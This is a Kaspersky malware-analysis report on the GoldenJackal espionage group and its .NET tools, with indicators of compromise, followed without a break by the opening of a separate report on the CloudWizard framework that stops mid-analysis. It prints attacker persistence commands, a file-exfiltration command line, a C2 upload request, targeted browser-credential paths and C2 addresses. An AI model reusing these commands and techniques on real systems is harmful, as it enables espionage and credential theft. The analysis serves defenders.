Kaspersky

GoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. Despite the fact that they began their activities years ago, this group is generally unknown and, as far as we know, has not been publicly described.

We started monitoring the group in mid-2020 and have observed a constant level of activity that indicates a capable and stealthy actor. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher intended to:

• control victim machines
• spread across systems using removable drives
• exfiltrate certain files from the infected system
• steal credentials
• collect information about the local system
• collect information about users’ web activities
• take screen captures of the desktop

Based on their toolset and the attacker’s behaviour, we believe the actor’s primary motivation is espionage.

Infection vectors

We have limited visibility on their infection vectors, but during our investigations, we observed the usage of fake Skype installers and malicious Word documents.

The fake Skype installer was a .NET executable file named skype32.exe that was approximately 400 MB in size. It was a dropper containing two resources: the JackalControl Trojan and a legitimate Skype for business standalone installer. This tool was used in 2020.

The other known infection vector was a malicious document that uses the remote template injection technique to download a malicious HTML page, which exploits the Follina vulnerability.

Malicious document – first page

The document was named “Gallery of Officers Who Have Received National And Foreign Awards.docx” and appears as a legitimate circular distributed to collect information about officers decorated by Pakistan’s government. It’s worth noting that the first description of the Follina vulnerability was published on May 29, 2022 and this document appears to have been modified on June 1, two days after publication, and was first detected on June 2.

The document was configured to load an external object from a legitimate and compromised website:

hxxps://www.pak-developers[.]net/internal_data/templates/template.html!

Code snippet used to load the remote resource

The remote webpage is a modified version of a public “Proof of Concept” to exploit the Follina vulnerability. The original PoC is available on GitHub. The attacker replaced the IT_BrowseForFile variable value with the following:

Code snippet used to exploit the Follina vulnerability

The decoded string is:

Decoded script

The exploit downloads and executes an executable file hosted on the legitimate compromised website, and stores it in the following path: “%Temp%\GoogleUpdateSetup.exe”. The downloaded file is the JackalControl malware.

In other cases, we do not have a real infection vector, but we observed a system compromised during lateral movements. Specifically, we observed the attacker using the psexec utility to start a malicious batch script.

cmd /c "c:\windows\temp\install.bat > c:\windows\temp\output.txt"

The batch script performs a variety of actions, such as installing Microsoft .Net Framework 4, infecting the system with the JackalControl Trojan, and collecting information about the system.

$temp\\dnf4.exe /q /norestart tasklist sc qc "WEvMngS" sc stop "WEvMngS" sc delete "WEvMngS" sc create "WEvMngS" binpath= "\"$windir\WEvMngS.exe\" /1" displayname= "Windows Event Manager" type= own start= auto" sc description "WEvMngS" "Provides event-related methods that register routed events." sc start "WEvMngS" schtasks /delete /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" schtasks /create /f /tn "\Microsoft\Windows\Diagnosis\Event Manager" /xml "$temp\\sch.xml" /ru "NT AUTHORITY\SYSTEM" sc qc "WEvMngS" schtasks /query /v /fo list /tn "\Microsoft\Windows\Diagnosis\Event Manager" tasklist netstat -aon ping -n 1 google.com ipconfig /displaydns netsh winhttp show proxy reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v

JackalControl

This is a Trojan that allows the attackers to remotely control the target machine through a set of predefined and supported commands. These are received via an HTTPS communication channel facilitated between the malware and the C2 servers, and can instruct the implant to conduct any of the following operations:

• Execute an arbitrary program with provided arguments
• Download arbitrary files to the local file system
• Upload arbitrary files from the local file system

During the last few years, the attackers updated this tool multiple times and we observed multiple variants. We are going to describe the latest version, which was observed in January 2023 (8C1070F188AE87FBA1148A3D791F2523).

The Trojan is an executable file that can be started as a standard program or as a Windows service.

It expects an argument, which can be equal to one of the following values:

• /0 : run as a standard program and contacts the C2 servers only once
• /1 : run as a standard program and contacts the C2 servers periodically
• /2 : run as a Windows service

The malware arguments and the related malware behavior change according to the variants. Some variants offer only two arguments:

• /0 run as a standard program
• /1 run as a Windows service

Other variants can install themselves with different persistence mechanisms. The malware’s execution flow is determined by the arguments provided in the command line with which it is run.

• /h0: will cause the malware to gain persistence by creating a Windows scheduled task.
• /h1: will cause the malware to gain persistence by creating a corresponding registry run key.
• /h2: will cause the malware to gain persistence by creating a Windows service.
• /r0: run as standard process (this argument is specified by the Windows scheduled task).
• /r1: run as standard process (this argument is specified by the generated registry run key value).
• /r2: run as a service (this argument is specified by the created Windows service).

Over the years the attackers have distributed different variants: some include code to maintain persistence, others were configured to run without infecting the system; and the infection procedure is usually performed by other components, such as the batch script mentioned above.

The malware starts its activities by generating a BOT_ID that is a unique value used to identify the compromised system. This value is derived from several other host-based values:

The UUID value obtained from the following WMI query:

select * from win32_computersystemproduct

The machine GUID obtained from the following registry key:

select * from win32_computersystemproduct

The list of attached drives, obtained from another WMI query, which in turn allows them to determine the ‘SerialNumber’ of ‘PHYSICALDRIVE0’:

select * from win32_diskdrive

The collected information is concatenated together in a byte array and then hashed with MD5, which is used as a seed for the creation of the BOT_ID. The algorithm used for the generation of the latter simply sums every two consecutive bytes from the resulting MD5 hash and places the resulting byte (modulus 256) as a single byte of the final BOT_ID. This logic is described in the code snippet below, taken from the malware.

Code snippet used to generate the BOT_ID

The resulting BOT_ID is used also to initialize the DES key and IV, which are then used to encrypt communication with the C2.

The malware communicates using HTTP POST requests where data arguments will be carried in encoded form as part of the request’s body. The overall request structure will then appear as follows:

POST /wp-includes/class-wp-network-statistics.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=----2c0272b325864985abf2677460a9b07a Accept-Language: en-GB,en;q=0.5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0, no-cache Pragma: no-cache Host: finasteridehair[.]com Content-Length: 154 Expect: 100-continue ------2c0272b325864985abf2677460a9b07a Content-Disposition: form-data; name="adv" %ENCODED_DATA% ------2c0272b325864985abf2677460a9b07a

A valid response should in turn be formed in the following way:

<!-- DEBUGDATA::%ENCODED_DATA% -->

The response is decoded with base64: the resulting payload is an array of strings, where the used delimiter is the standard Windows new line sequence – “\r\n”. Each line is decoded again with base64, decrypted with DES, and decompressed with the GZIP algorithm.

Each command has the following structure:

Command structure

The command type must be equal to one of the following codes:

Command Description 00 Execute – Execute an arbitrary program with the specified arguments. If the attacker sets the NoWait flag to False, the malware redirects the process output, reads the data and forwards them to the C2. 01 Download – Read a file from the local system and upload it to the server. 02 Upload – Save received data to the local system using the filepath specified by the attacker.

The Command Data field is intended to carry information on the command arguments and has a different structure for each action type, as specified below:

• Execute
  
• Download
  
• Upload
  

The command results are usually composed into a message that also includes the values of the underlying command type and command ID, which uniquely identifies an instance of a command issued to the malware. The three values are compressed with GZIP, encrypted with DES, and encoded with base64.

The resulting payload is concatenated with the BOT_ID using the “|” char, encoded again with base64, after which it gets uploaded to the remote server using the aforementioned POST request format.

Installer mode

Some variants can infect the system, creating a copy of the malware in a specific location and guaranteeing its persistence.

The malware location is selected with a specific procedure. It enumerates all subdirectories in CommonApplicationData and randomly selects one to which its copy will be saved. The generated file name will be suffixed with the subdirectory’s names and appended with another static value, Launcher.exe, as outlined below:

Selected directory: C:\ProgramData\Windows App Certification Kit Launcher Malware copy: "C:\ProgramData\Windows App Certification Kit Launcher\WindowsAppCertificationKitLauncher.exe"

If the operation succeeds, it also changes the new file timestamp and makes it the same as that of the selected subdirectory.

If the operation fails, it randomly selects another directory and tries again to copy the malware.

If the operation fails with all subdirectories, it tries to use a list of hard-coded directory names:

• Google
• Viber
• AdGuard
• WinZip
• WinRAR
• Adobe
• CyberLink
• Intel

If all the previous attempts fail, it tries to use the same procedure in the following locations:

• ApplicationData
• LocalApplicationData
• Temp

Persistence

The malware’s persistence is usually guaranteed with one of the following mechanisms:

• Service installation
• Creation of a new Windows registry key value
• Creation of a new scheduled task.

The service is usually installed by the malware with the execution of the Windows sc.exe utility.

sc create "[MALWARE_NAME_NO_EXT]" binpath= "[MALWARE_FULL_PATH]" /[ARGUMENT]" displayname= "WORKPATH" type= own start= auto sc description "[MALWARE_NAME_NO_EXT]" "This service keeps your installation up to date with the latest enhancements and security fixes." sc start "[MALWARE_NAME_NO_EXT]"

The registry value is equal to the copied malware file name, without the extension, and is stored under the following key:

Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Value name: "[MALWARE_NAME_NO_EXT]" Value data: "[MALWARE_FULL_PATH] [ARGUMENT]"

The scheduled task is created using a hard-coded XML template that is modified at runtime and dropped in the file system using the same malware file path, but with a different extension, .xml instead of .exe.

The generated XML file is then used with the Windows schtasks.exe utility to create the task.

For example:

schtasks.exe /create /f /tn "Adobe Update" /xml "C:\ProgramData\Adobe\adobeupd.xml"

The task and service description change according to the variant.

JackalSteal

JackalSteal is another implant usually deployed on a few compromised machines that is used to find files of interest on the target’s system and exfiltrate them to the C2 server.

This tool can be used to monitor removable USB drives, remote shares, and all logical drives in the targeted system. The malware can work as a standard process or as a service. It cannot maintain persistence, so it must be installed by another component.

JackalSteal starts its execution by parsing the arguments.

Option Description -n a unique identifier value for the configured profile -p directory path to inspect -s maximum size of requested files -d number of days since the last write of the requested files -m a comma-separated list of string masks to look for using a regular expression within the configured directory -w time interval in seconds between consecutive directory scans for the configured profile -e exclude path from the scanning activities /0 run as standard process /1 run as a service

These options allow the attacker to specify the ‘profile’, which defines what files are of interest to the attackers. The profile consists of an ID and a list of patterns. Each pattern contains a list of options with the following properties:

Property Description Path target paths credentials user and password used to access a remote share Masks string with wildcard and mask characters that can be used to match any set of files using a regular expression MaxSize maximum size of a file Days the number of days since the file was last written Interval the time interval between two consecutive path scans Exclude paths that must be excluded during scanning activities

The command used to configure the JackalSteal component is as follows:

%TEMP%\\setup01.exe -p all -p usb -e Windows -e \"Program Files*\" -e ProgramData -e Users\\*\\AppData -e *\\AppData -s 15 -d 30 -w 3600 -m *.doc,*.docx,*.pdf,*.jpg,*.png,*.tif,*.tiff,*.txt,*.ppt,*.pptx,*.xls,*.xlsx -n 48df302a44c392eb

The unique identifier “–n” is usually the same BOT_ID generated by the JackalControl Trojan.

After argument processing, the malware serializes the data in an XML, encrypts them with DES using a key generated from the ID passed with the “-n” option and stores the resulting payload in the following location: “%ApplicationData%\SNMP\cache\%Filename%”, where %Filename% is a GUID generated from an MD5 of the unique identifier specified by the attacker.

The malware is usually executed with the “/0” or “/1” option and the “-n” option, which is used to load the obtained profile ID. In the second case, it loads the profile from the previously mentioned location and it starts the ‘Watchers’.

A Watcher is an object defined in a class with the same name that runs in a different thread and scans the location according to the specified options. The pattern could represent:

• a simple path in the local filesystem;
• a path on a remote share;
• constant string all;
• constant string usb.

When the pattern equals ‘all’, the malware enumerates all logical drives, and for each one it creates a new Watcher object. When the pattern is ‘usb’, it listens for system events corresponding to the action of creating a new removable drive on the system. When a new drive is detected, it creates a new Watcher object.

Every time a new Watcher is added, the malware notifies the log of the event and sends the information to the remote C2 using HTTP Post requests.

The log is created using the following string as a template:

Path: {0}{1}\r\nMasks: {2}\r\nExclude: {3}\r\nDays: {4}\r\nMaxSize: {5}\r\nInterval: {6}

And is uploaded inside an encrypted payload that contains the following information:

|<AES_Key,AES_IV><Agent_id\\%yyyyMMddHHmmssfff%.log><Log content>|

The AES_Key and AES_IV are generated for each request and are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.

The Agent_id\\Log_path.log and the Log content data are encrypted with the AES algorithm and compressed with GZIP.

The Watcher objects are responsible for scanning activities. When a Watcher starts, it enumerates all files in the directory and its subdirectories. The scanner can also resolve the .lnk links. When the scanner detects a file that matches the defined properties (mask, days, max size, not in exclusions), it calculates the file content hash, checks if the resulting value is present in a hash table stored in the local cache directory and adds the value if not present. When a new file is detected, the malware uploads the file and the related filepath inside an encrypted payload using the same logic described above.

In this case, the encrypted payload contains the following information:

|<AES_Key,AES_IV><Agent_id\\Local_file_path><File content>|

The Agent_id\\Local_file_path and the File content data are encrypted with the AES algorithm and compressed with GZIP.

JackalWorm

This worm was developed to spread and infect systems using removable USB drives. The program was designed as a flexible tool that can be used to infect systems with any malware.

Its behavior changes according to the parent process.

When the malware is working on a system that is already infected and the parent process is taskeng.exe or services.exe:

1. Monitors removable USB drives
2. When a device is attached, hides the last-modified directory and replaces it with a copy of the worm

The code used to monitor removable USB drives is the same one observed in JackalSteal. It creates a ManagementEventWatcher object, which allows it to subscribe to event notifications that correspond to a given WQL query and the issuing of a callback upon their interception. The query used by the malware instructs the system to check for a logical removable disk creation event every five seconds:

select * from __InstanceCreationEvent within 5 where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType = 2

When the malware detects a removable USB storage device, it will copy itself onto it. The path it will copy to is determined by listing all directories and selecting the one that was modified last. It will create a copy of itself on the drive root using the same directory name and change the directory’s attribute to “hidden”. This will result in the actual directory being hidden and replaced with a copy of the malware with the directory name. Moreover, JackalWorm uses an icon mimicking a Windows directory, tricking the user into executing the malware when trying to access a directory.

In the following example, the removable drive “E:” was infected by the malware, which copied itself as Folder1.exe and changed the attributes of Folder1 to hide it:

Infected device

When the malware starts on a clean system and the parent process is explorer.exe and the file is located in a removable drive the behavior is as follows:

1. Opens the hidden directory
2. Performs the actions specified in the configuration files
3. Infects the system with the worm

The configuration files are embedded resources that contain XML data that can be used to instruct the worm to perform some actions:

• Drop a program and guarantee its persistence with a scheduled task
• Drop a program and execute it with the specified arguments
• Execute an existing program with the specified arguments

A valid configuration file looks like this:

<Resource type="install" interval="15" ext="exe" data="rcdata02" />

In this case, the worm was configured to install the PE file stored in another resource “rcdata02”, save it with the extension .exe and create a scheduled task to run it every 15 minutes.

Other valid examples are:

<Resource type="process" file="%TMP%\test.exe" args="" data="rcdata02" />

Drops the PE file stored in another resource “rcdata02” in “%TEMP%\test.exe” and executes it.

<Resource type="process" file="%WINDIR%\system32\ping.exe" args="1.1.1.1"/>

Executes the program “%WINDIR%\system32\ping.exe” with the argument “1.1.1.1”.

In our investigations, we observed only the first example and the malware was configured to install the JackalControl Trojan.

The installation procedure selects the malware location in much the same way as the procedure described in the section above. It differs from the other one because it enumerates the subdirectories in CommonAppData only and copies the file using the subdirectory’s names concatenated with another static value, upd.exe.

If it fails, it tries with a list of hard-coded directory names, which is a bit different from the procedure described above.

• Google
• Mozilla
• Adobe
• Intel
• [Random GUID]

The worm maintains its persistence by creating a scheduled task with a hard-coded XML template dynamically modified at runtime. Once installed, the worm deletes itself from the removable drive by using a batch script. The script is dropped in the local Temp directory with a random name:

@echo off @chcp 65001>nul :check @tasklist | findstr /i "%executingFilename%" >nul @if %errorlevel%==0 goto check @del /f /q /a h "%executingPath%" @del /f /q "%Temp%\%randomname%.bat"

Future removable drives that are attached will be re-infected with JackalWorm.

It is also worth mentioning that this tool seems to be under development. We deduced this by analyzing the embedded .NET resources of the file 5DE309466B2163958C2E12C7B02D8384. Their size is 193973 bytes, which is much bigger than their actual content:

• Rcdata01 – XML config – Size: 67 bytes
• Rcdata02 – JackalControl Trojan – Size: 27136 bytes

It means there are 166770 bytes of unknown data. Most of them are part of the legitimate notepad.exe Windows utility, and specifically, the first 0x6A30 bytes were overwritten. After the legitimate notepad.exe image, we found also the following XML configurations:

<Resource type="scheduler" interval="15" ext="exe" args="" data="notepad" />

<Resource type="process" file="cmd.exe" args="/c echo TEST > %USERPROFILE%\Desktop\test.txt" />

The first XML shows a new type value: ‘scheduler’, which is not specified in the code. The second XML shows that this specific resource was used for testing purposes and the attacker was trying to run cmd.exe to write the word “TEST” in a text file in the desktop: %USERPROFILE%\Desktop\test.txt.

JackalPerInfo

This malware was developed to collect information about the compromised system, as well as a specific set of files that could potentially be used to retrieve stored credentials and the user’s web activities. The attacker named it “perinfo”, a contraction of the program’s main class name PersonalInfoContainer.

Its behaviour changes according to the number of arguments provided during execution. Specifically, when executed with only one argument, the malware collects a predefined set of information and stores it in a binary file compressed with GZIP. The filename is specified in the argument provided. When executed with two arguments, the malware uses the first argument to load a previously generated binary file and extract all the information to a directory specified by the second argument.

By default, the program should be executed with one argument. Once it is executed, the malware starts collecting information about the system using a specific function, GetSysInfo, which collects the following information:

Computer name: %s OS version: %S Domain: %S User: %S Local time: %s Interfaces: %Interface Name% DESC: TYPE: MAC: IP: GW: DNS: DHCP: DOMAIN: Remote IP: Current directory: Drives: C:\ Fixed D:\ CDRom ... Applications: %Installed Application1% %Installed Application2% ... Processes: %Process Name 1% Desc: %s Name: %s Path: %s %Process Name 2% ...

This specific function was also observed in the first JackalControl variants, but was removed from newer variants.

The malware continues its operation by enumerating the logical drives on the system; and for each one it enumerates the files in the root path. The collected info includes the last write time, the filename, and the file size.

It then enumerates the Users directory in the system drive, usually C:\Users\. For each user, it enumerates the content of the following directories:

• Desktop
• Documents
• Downloads
• AppData\Roaming\Microsoft\Windows\Recent

It tries also to acquire the following files:

Desktop\*.txt Documents\*.txt AppData\Local\Microsoft\Windows\WebCache\*.log AppData\Roaming\Microsoft\Windows\Cookies\*.txt AppData\Local\Google\Chrome\User Data\*\Bookmarks AppData\Local\Google\Chrome\User Data\*\Cookies AppData\Local\Google\Chrome\User Data\*\History AppData\Local\Google\Chrome\User Data\*\Login Data AppData\Local\Google\Chrome\User Data\*\Shortcuts AppData\Local\Google\Chrome\User Data\*\Web Data AppData\Roaming\Opera\Opera\*\bookmarks.adr AppData\Roaming\Opera\Opera\*\global_history.dat AppData\Roaming\Mozilla\Firefox\Profiles\*\places.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\cookies.sqlite AppData\Roaming\Mozilla\Firefox\Profiles\*\formhistory.sqlite

The malware attempts to steal credentials stored in the victim’s browser databases, as well as other information such as cookies that could be used to gain access to web services.

Finally, it serializes the collected information to a binary format, compresses all the data with the GZIP algorithm, and stores everything in the file specified with the first argument provided by the attacker.

JackalScreenWatcher

This tool is used to collect screenshots of the victim’s desktop and sends the pictures to a remote, hard-coded C2 server:

hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php

This specific webpage was also used as a C2 for the JackalSteal component, indicating that the tools are probably part of a unique framework.

The malware can handle some arguments that are optional and can be provided as input:

• -r resolution ratio (default 1.0)
• -i interval (default 10 seconds)
• -n specify a custom agent id. By default, this value is equal to: %Hostname%\%Username%

The program’s primary function involves running a thread that scans all displays on the system, checking their dimensions. It then starts an infinite loop, periodically checking if the user is active on the system. Whenever the malware detects user activity, it captures a screenshot and sends it to the remote server.

User activity is detected by monitoring the cursor’s position and checking if it has changed since the last recorded position. After uploading a screenshot, it waits for a specified interval before restarting the loop.

The screenshots are uploaded inside an encrypted payload using HTTP Post requests.

The encrypted payload is similar to that used by JackalSteal and contains the following information:

|<AES_Key,AES_IV><Remote filename><Screenshot>|

AES_Key and AES_IV are encrypted with the RSA algorithm using a key embedded in the code. The resulting payload is also compressed with the GZIP algorithm.

The Remote filename and Screenshot data are encrypted with the AES algorithm and compressed with GZIP. The RSA key is the same as that observed in other JackalSteal components.

Infrastructure

GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. We believe the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server.

We don’t have any evidence of the vulnerabilities used to compromise the sites. However, we did observe that many of the websites were using obsolete versions of WordPress and some had also been defaced or infected with previously uploaded web shells, likely as a result of low-key hacktivist or cybercriminal activity. For this reason, we assess that the vulnerabilities used to breach these websites are known ones rather than 0-days.

The remote webpage usually replies with a fake “Not Found” page. The HTTP response status code is “200”, but the HTTP body shows a “Not found” webpage.

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL %FILE PATH% was not found on this server.</p> <hr> <address>%SERVER%</address> </body></html>

In specific cases, the attacker provides a valid response with a list of commands. In those cases, the previous body is followed by a long list of standard Windows new line sequences – “\r\n” – and finally the previously mentioned delimiter:

<!-- DEBUGDATA::%ENCODED_DATA% -->

Victims

Over the years, we have observed a limited number of attacks against government and diplomatic entities in the Middle East and South Asia. We observed victims in: Afghanistan, Azerbaijan, Iran, Iraq, Pakistan and Turkey.

Geography of victims

Attribution

We are unable to link GoldenJackal to any known actor.

During our investigations, we observed some similarities between GoldenJackal and Turla. Specifically, we noticed a code similarity in the victim UID generation algorithm that overlaps somewhat with that used by Kazuar.

Specifically, Kazuar gets the MD5 hash of a predefined string and then XORs it with a four-byte unique “seed” from the machine. The seed is obtained by fetching the serial number of the volume where the operating system is installed.

public static Guid md5_plus_xor(string string_0) { byte[] bytes = BitConverter.GetBytes(parameter_class.unique_pc_identifier); byte[] array = MD5.Create().ComputeHash(get_bytes_wrapper(string_0)); for (int i = 0; i < array.Length; i++) { byte[] array2 = array; int num = i; array2[num] ^= bytes[i % bytes.Length]; } return new Guid(array); }

JackalControl uses an MD5+SHIFT algorithm. It collects a set of information from the machine, including the serial number of the volume where the operating system is installed, to generate a unique seed with the MD5 algorithm. Then it uses the resulting byte array, summing every two consecutive bytes from the resulting MD5 hash and placing the resulting bytes (modulus 256) as the sequence that constructs the final BOT_ID.

Code snippet used to generate the BOT_ID

Moreover, the use of tools developed in .NET and of compromised WordPress websites as C2 is a common Turla TTP.

Last but not least, the groups share an interest in the same targets, and in one specific case we observed that a victim machine was infected with a Turla artifact two months before the GoldenJackal infection.

Despite these similarities, we assessed with low confidence that there is a connection between GoldenJackal and Turla, since neither of these is unique to either threat actor. The use of compromised WordPress websites is not a unique TTP. This technique was also observed in activity by other groups such as BlackShadow, another APT active in the Middle East that uses .NET malware. The code similarities are related to a single function in a .NET program that could be easily copied with a decompiler. It is possible that GoldenJackal used that algorithm as a false flag. Another hypothesis is that the developers behind JackalControl were inspired by Turla and decided to replicate the UID generation algorithm. Finally, the shared interest in the same targets is easily explained by the fact that the victims are high-profile targets that could be considered interesting by different actors.

Conclusions

GoldenJackal is an interesting APT actor that tries to keep a low profile. Despite its long-term activities, which are believed to have started in June 2019, this group and the related samples are still generally unknown.

The group is probably trying to reduce its visibility by limiting the number of victims. According to our telemetry, the number of targets is very low and most of them were related to government or diplomatic entities. Moreover, some of the samples were deployed only on systems that were not protected by Kaspersky during the infection phase. This may indicate that the actor is trying to protect some of its tools and avoid specific security solutions.

Their toolkit seems to be under development – the number of variants shows that they are still investing in it. The latest malware, JackalWorm, appeared in the second half of 2022 and appears to still be in the testing phase. This tool was unexpected because in previous years the attacks were limited to a small group of high-profile entities, and a tool like JackalWorm is probably difficult to bind and can easily get out of control.

More information about GoldenJackal, including IoCs and YARA rules, are available to customers of the Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com.

Indicators of compromise MD5 hashes

JackalControl
5ed498f9ad6e74442b9b6fe289d9feb3
a5ad15a9115a60f15b7796bc717a471d
c6e5c8bd7c066008178bc1fb19437763
4f041937da7748ebf6d0bbc44f1373c9
eab4f3a69b2d30b16df3d780d689794c
8c1070f188ae87fba1148a3d791f2523

JackalSteal
c05999b9390a3d8f4086f6074a592bc2

JackalWorm
5de309466b2163958c2e12c7b02d8384

JackalPerInfo
a491aefb659d2952002ef20ae98d7465

JackalScreenWatcher
1072bfeee89e369a9355819ffa39ad20

Legitimate compromised websites

JackalControl C2
hxxp://abert-online[.]de/meeting/plugins[.]php
hxxp://acehigh[.]host/robotx[.]php
hxxp://assistance[.]uz/admin/plugins[.]php
hxxp://cnom[.]sante[.]gov[.]ml/components/com_avreloaded/views/popup/tmpl/header[.]php
hxxp://info[.]merysof[.]am/plugins/search/content/plugins[.]php
hxxp://invest[.]zyrardow[.]pl/admin/model/setting/plugins[.]php
hxxp://weblines[.]gr/gallery/gallery_input[.]php
hxxp://www[.]wetter-bild[.]de/plugins[.]php
hxxps://ajapnyakmc[.]com/wp-content/cache/index[.]php
hxxps://asusiran[.]com/wp-content/plugins/persian-woocommerce/include/class-cache[.]php
hxxps://asusiran[.]com/wp-content/themes/woodmart/inc/modules/cache[.]php
hxxps://croma[.]vn/wp-content/themes/croma/template-parts/footer[.]php
hxxps://den-photomaster[.]kz/wp-track[.]php
hxxps://eyetelligence[.]ai/wp-content/themes/cms/inc/template-parts/footer[.]php
hxxps://finasteridehair[.]com/wp-includes/class-wp-network-statistics[.]php
hxxps://gradaran[.]be/wp-content/themes/tb-sound/inc/footer[.]php
hxxps://mehrganhospital[.]com/wp-includes/class-wp-tax-system[.]php
hxxps://meukowcognac[.]com/wp-content/themes/astra/page-flags[.]php
hxxps://nassiraq[.]iq/wp-includes/class-wp-header-styles[.]php
hxxps://new[.]jmcashback[.]com/wp-track[.]php
hxxps://news[.]lmond[.]com/wp-content/themes/newsbook/inc/footer[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/cache/functions[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/dt-the7/inc/cache[.]php
hxxps://pabalochistan[.]gov[.]pk/new/wp-content/themes/twentyfifteen/content-manager[.]php
hxxps://sbj-i[.]com/wp-content/plugins/wp-persian/includes/class-wp-cache[.]php
hxxps://sbj-i[.]com/wp-content/themes/hamyarwp-spacious/cache[.]php
hxxps://sokerpower[.]com/wp-includes/class-wp-header-styles[.]php
hxxps://technocometsolutions[.]com/wp-content/themes/seofy/templates-sample[.]php
hxxps://www[.]djstuff[.]fr/wp-content/themes/twentyfourteen/inc/footer[.]php
hxxps://www[.]perlesoie[.]com/wp-content/plugins/contact-form-7/includes/cache[.]php
hxxps://www[.]perlesoie[.]com/wp-content/themes/flatsome/inc/classes/class-flatsome-cache[.]php

JackalSteal/JackalScreenWatcher C2
hxxps://tahaherbal[.]ir/wp-includes/class-wp-http-iwr-client.php
hxxps://winoptimum[.]com/wp-includes/customize/class-wp-customize-sidebar-refresh.php

Distribution websites
hxxps://www[.]pak-developers[.]net/internal_data/templates/template.html
hxxps://www[.]pak-developers[.]net/internal_data/templates/bottom.jpg

In March 2023, we uncovered a previously unknown APT campaign in the region of the Russo-Ukrainian conflict that involved the use of PowerMagic and CommonMagic implants. However, at the time it was not clear which threat actor was behind the attack. Since the release of our report about CommonMagic, we have been looking for additional clues that would allow us to learn more about this actor. As we expected, we have been able to gain a deeper insight into the “bad magic” story.

While looking for implants bearing similarities with PowerMagic and CommonMagic, we identified a cluster of even more sophisticated malicious activities originating from the same threat actor. What was most interesting about it is that its victims were located not only in the Donetsk, Lugansk and Crimea regions, but also in central and western Ukraine. Targets included individuals, as well as diplomatic and research organizations. The newly discovered campaign involved using a modular framework we dubbed CloudWizard. Its features include taking screenshots, microphone recording, keylogging and more.

Over the years, the infosec community has discovered multiple APTs operating in the Russo-Ukrainian conflict region – Gamaredon, CloudAtlas, BlackEnergy and many others. Some of these APTs have long been forgotten in the past – such as Prikormka (Operation Groundbait), discovered by ESET in 2016. While there have been no updates about Prikormka or Operation Groundbait for a few years now, we discovered multiple similarities between the malware used in that campaign, CommonMagic and CloudWizard. Upon further investigation, we found that CloudWizard has a rich and interesting history that we decided to dig into.

Initial findings

Our investigation started with telemetry data coming from an active infection, with malware running as a suspicious Windows service named “syncobjsup”. This service was controlled by a DLL with an equally suspicious path “C:\ProgramData\Apparition Storage\syncobjsup.dll”. Upon execution, we found this DLL to decrypt data from the file mods.lrc that is located in the same directory as the DLL. The cipher used for decryption was RC5, with the key 88 6A 3F 24 D3 08 A3 85 E6 21 28 45 77 13 D0 38. However, decryption of the file with the standard RC5 implementation yielded only junk data. A closer look into the RC5 implementation in the sample revealed that it was faulty:

for (i = 0; i < 4; i += 2) { A = buf[i]; B = buf[i + 1]; for (j = 12; j > 0; --j) { v2 = rotate_right(B - S[2 * i + 1], A); B = A ^ v2; A ^= v2 ^ rotate_right(A - S[2 * i], A ^ v2); } }

The bug is in the inner loop: it uses the variable i instead of j.

A search for this incorrect implementation revealed a GitHub gist of the code that has been likely borrowed by the implant’s developers. In the comments to this gist, GitHub users highlight the error:

What is also interesting is that the key from the gist is the same as the one used in the syncobjsup.dll library.

The decrypted file looked to us like a virtual file system (VFS), containing multiple executables and their JSON-encoded configurations:

Each entry in this VFS contains magic bytes (‘CiCi’), a ROR6 hash of the entry name, as well as the entry size and contents.

Inside mods.lrc, we found:

• Three DLLs (with export table names Main.dll, Crypton.dll and Internet.dll);
• A JSON configuration of these DLLs.

The syncobjsup.dll DLL iterates over VFS entries, looking for an entry with the name “Main” (ROR6 hash: 0xAA23406F). This entry contains CloudWizard’s Main.dll orchestrator library, which is reflectively loaded and launched by invoking its SvcEntry export.

Digging into the orchestrator

Upon launching, the orchestrator spawns a suspended WmiPrvSE.exe process and injects itself into it. From the WmiPrvSE.exe process, it makes a backup of the VFS file, copying mods.lrc to mods.lrs. It then parses mods.lrs to obtain all the framework module DLLs and their configurations. As mentioned above, configurations are JSON files with dictionary objects:

{ "Screenshot": { "type": "3", "intervalSec": "4", "numberPack": "24", "winTitle": [ "SKYPE", "VIBER" ] }, "Keylogger": { "bufSize": "100" }, "Microphone": { "intervalSec": "500", "acousticStart": "1" } }

The orchestrator itself contains a configuration with parameters such as:

• Victim ID (e.g., 03072020DD);
• Framework version (latest observed version is 5.0);
• Interval between two consecutive heartbeats.

After launching modules, the orchestrator starts communicating with the attackers by sending heartbeat messages. Each heartbeat is a JSON file with victim information and a list of loaded modules:

{ "name": "<victim_id>", "romoID": "2", "bitOS": "64", "version": "5.0", "serial": "<infection_timestamp>", "keyID": "<key_id>", "ip": "0.0.0.0", "state": [ "Main","Crypton","Internet","Screenshot", "USB","Keylogger","Gmail" ], "state2": [ {"Module": "Main","time_mode": "2","Version": "4.7"}, {"Module": "Crypton","time_mode": "2","Version": "1.0"}, {"Module": "Internet","time_mode": "2","Version": "0.07"}, {"Module": "Screenshot","time_mode": "2","Version": "0.01"}, {"Module": "USB","time_mode": "2","Version": "0.01"}, {"Module": "Keylogger","time_mode": "2","Version": "0.01"}, {"Module": "Gmail","time_mode": "2","Version": "0.06"} ] }

This JSON string is encrypted with the cryptography module (Crypton.dll from the VFS) and sent to the attackers with the internet communication module (Internet.dll).

